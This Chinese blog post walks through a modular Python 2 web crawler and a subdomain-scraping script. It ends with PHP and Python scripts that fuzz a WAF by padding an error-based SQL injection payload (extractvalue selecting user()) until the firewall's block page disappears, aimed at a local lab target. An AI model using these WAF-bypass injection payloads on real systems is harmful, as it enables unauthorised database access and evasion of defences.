你所需要的,不仅仅是一个好用的代理。
这个爬虫是慕课网上的蚂蚁老师讲的,感觉做的非常好,就改了一下,本来是用来爬取百度百科python1000条词条的(现在还是能爬的,要是之后目标更新了,就得制订新的爬虫策略了,大的框架不需要变),改成了爬取网站整站连接,扩展性还是很好的。
爬虫的基本构成,抓一张蚂蚁老师的图:
1.调度器:调度器用来对各个部分进行调度,如将url取出,送给下载器下载,将下载是页面送给解析器解析,解析出新的url及想要的数据等
2.url管理器:url管理器要维护两个set()(为啥用set(),因为set()自带去重功能),一个标识已抓取的url,一个标识待抓取的url,同时,url管理器还要有将解析器解析出来的新url放到待抓取的url里的方法等
3.下载器:实现最简单,抓取静态页面只需要r = requests.get,然后r.content,页面内容就存进内存了,当然,你存进数据库里也是可以的;但是同时也是扩展时的重点,比如某些页面需要登陆才能访问,这时候就得post传输账号密码或者加上已经登陆产生的cookie
4.解析器:BeautifulSoup或者正则或者采用binghe牛的pyquery来解析下载器下载来的页面数据
5.输出器:主要功能输出想得到的数据
调度器:
spider_main.py
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
from spider import url_manager, html_downloader, html_outputer, html_parser
class SpiderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url):
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
try :
new_url = self.urls.get_new_url()
print 'craw : %s' % new_url
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
except:
print 'craw failed'
self.outputer.output_html()
if __name__ == "__main__":
root_url = "自己想爬的网站,我爬了下爱编程,效果还行"
obj_spider = SpiderMain()
obj_spider.craw(root_url)
其中__init__是初始化,url_manager, html_downloader, html_outputer, html_parser是自己写的模块,各个模块里有各自的类和方法,通过初始化得到相应类的实例;
craw是调度器对各个模块的调度:
new_url = self.urls.get_new_url()
print 'craw : %s' % new_url
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
分别对应着:
1.从待爬取url列表中取出一个url
2.将改url送往下载器下载,返回页面内容
3.将页面送往解析器解析,解析出新的url列表和想要的数据
4.调度url管理器,将新的url添加进带爬取的url列表
5.调度输出器输出数据
url管理器:
url_manager.py:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
def add_new_url(self, url):
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
def add_new_urls(self, urls):
if urls is None or len(urls) == 0:
return
for url in urls:
self.add_new_url(url)
def has_new_url(self):
return len(self.new_urls) != 0
def get_new_url(self):
new_url = self.new_urls.pop()
self.old_urls.add(new_url)
return new_url
url_manager模块里的类,及类的方法
下载器:
html_downloader.py
本来蚂蚁老师用的urllib,我给改了,改成requests:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import urllib2
import requests
class HtmlDownloader(object):
def download(self, url):
if url is None:
return None
r = requests.get(url,timeout=3)
if r.status_code != 200:
return None
return r.content
html解析器:
html_parser.py
把抓取策略给改了,现在是解析所有链接,即a标签href的值
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import re
import urlparse
from bs4 import BeautifulSoup
class HtmlParser(object):
def parse(self, page_url, html_cont):
if page_url is None or html_cont is None:
return
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
new_urls = self._get_new_urls(page_url, soup)
new_data = self._get_new_data(page_url, soup)
return new_urls, new_data
def _get_new_urls(self, page_url, soup):
new_urls = set()
links = soup.find_all('a')
for link in links:
new_url = link['href']
new_full_url = urlparse.urljoin(page_url, new_url)
new_urls.add(new_full_url)
return new_urls
def _get_new_data(self, page_url, soup):
res_data = {}
# url
return res_data
html_outputer.py
这个看情况,可要可不要,反正已经能打印出来了:
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class HtmlOutputer(object):
def __init__(self):
self.datas = []
def collect_data(self, data):
if data is None:
return
self.datas.append(data)
def output_html(self):
fout = open('output.html', 'w')
fout.write("<html>")
fout.write("<body>")
fout.write("<table>")
for data in self.datas:
fout.write("<tr>")
fout.write("<td>%s</td>" % data['url'])
#fout.write("<td>%s</td>" % data['title'].encode('utf-8'))
#fout.write("<td>%s</td>" % data['summary'].encode('utf-8'))
fout.write("</tr>")
fout.write("</table>")
fout.write("</body>")
fout.write("</html>")
fout.close()
这款爬虫可扩展性挺好,之后大家可以扩展爬取自己想要的内容
当然要是只需要爬取某个页面的某些内容,完全不必要这么麻烦,一个小脚本就好了:
比如我要爬取某二级域名接口中的二级域名结果:
#coding: utf-8
import urllib, re
def getall(url):
page = urllib.urlopen(url).read()
return page
def ressubd(all):
a = re.compile(r'value="(.*?.com|.*?.cn|.*?.com.cn|.*?.org| )"><input')
subdomains = re.findall(a, all)
return (subdomains)
if __name__ == '__main__':
print '作者:深夜'.decode('utf-8').encode('gbk')
print '--------------'
print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
print '--------------'
url = 'http://i.links.cn/subdomain/' + raw_input('请输入主域名:'.decode('utf-8').encode('gbk')) + '.html'
all = getall(url)
subd = ressubd(all)
sub = ''.join(subd)
s = sub.replace('http://', '\n')
print s
with open('url.txt', 'w') as f:
f.writelines(s)
脚本用正则就好了,写的快
之前海盗表哥写过过狗的一个php fuzz脚本
http://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=16134
表哥写的php版本的:
<?php $i=10000;
$url = 'http://192.168.1.121/sqlin.php'; for(;;){
$i++;
echo "$i\n";
$payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1='.str_repeat('3',$i); $ret = doPost($url,$payload);
if(!strpos($ret,'网站防火墙')){
echo "done!\n".strlen($payload)."\n".$ret; die();
}
}
function doPost($url,$data=''){ $ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_HEADER, 0 ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); $return = curl_exec ($ch);
curl_close ($ch); return $return;
}
我在本地搭了个环境,然后用python也写了下,还是挺好写的:
#coding: utf-8
import requests, os
#i = 9990;
url = 'http://localhost:8090/sqlin.php'
def dopost(url, data=''):
r = requests.post(url, data)
return r.content
for i in range(9990, 10000):
payload = {'id':'1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
#print payload
ret = dopost(url, payload)
ret = ''.join(ret)
if ret.find('网站防火墙') == -1:
print "done\n" + "\n" + ret
exit(0)
学生党还是很苦逼的,1.15号才考完试,不说了,写文章写了俩小时。。我去复习了,各位表哥有意见或者建议尽管提,文章哪里不对的话会改的